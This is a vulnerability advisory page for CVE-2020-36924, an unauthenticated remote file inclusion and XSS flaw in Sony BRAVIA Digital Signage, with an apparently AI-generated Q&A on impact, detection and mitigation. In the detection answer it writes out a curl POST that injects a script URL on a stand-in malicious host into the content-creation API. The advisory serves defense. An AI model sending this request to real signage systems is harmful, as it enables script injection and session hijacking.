CVE-2020-36924
Remote File Inclusion in Sony BRAVIA Digital Signage Enables XSS
Publication date: 2026-01-06
Last updated on: 2026-01-06
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| sony | bravia_digital_signage | to 1.7.8 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-829 | The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2020-36924 is an unauthenticated remote file inclusion vulnerability in Sony BRAVIA Digital Signage version 1.7.8 and earlier. It allows attackers to inject arbitrary client-side scripts such as JavaScript, VBScript, or HTML through the content material URL parameter when adding HTML-type content. This flaw enables attackers to execute cross-site scripting (XSS) attacks, hijack user sessions, alter the appearance of the web interface, and modify the content displayed on the signage remotely without authentication. [1, 2, 3, 4]
How can this vulnerability impact me? :
Exploitation of this vulnerability can lead to session hijacking, allowing attackers to take over user sessions. Attackers can also execute cross-site scripting (XSS) attacks, which may compromise user data or perform unauthorized actions. Additionally, attackers can alter the appearance and content displayed on the digital signage, potentially causing misinformation or damaging the organization's reputation. Since the vulnerability is exploitable remotely without authentication, it poses a significant security risk to environments using Sony BRAVIA Digital Signage. [1, 2, 4]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the API endpoint `/api/content-creation?type=create&id=...` that include JSON payloads with a "material" array containing HTML type entries referencing external URLs. Such requests may indicate attempts to inject arbitrary client-side scripts. A practical detection method is to capture and analyze network traffic for these specific POST requests. For example, using curl to simulate or detect such requests: `curl -X POST -H "Content-Type: application/json" -d '{"material":[{"type":"html","url":"http://malicious.example.com/script.js"}]}' http://<target-ip>/api/content-creation?type=create&id=<id>` can test if the endpoint is vulnerable. Additionally, network monitoring tools like Wireshark or intrusion detection systems can be configured to alert on such suspicious API calls. [2, 4]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the Sony BRAVIA Digital Signage management interface and API endpoints to trusted networks only, implementing network-level controls such as firewalls to block unauthorized access, and monitoring for suspicious POST requests to the `/api/content-creation` endpoint. Since the vulnerability involves unauthenticated remote file inclusion via the content material URL parameter, disabling or restricting the ability to add HTML-type content remotely can reduce risk. Applying any available patches or updates from Sony is recommended if released. If patches are not available, consider isolating the affected systems from untrusted networks and reviewing content submission workflows to prevent injection of arbitrary scripts. [1, 2, 4]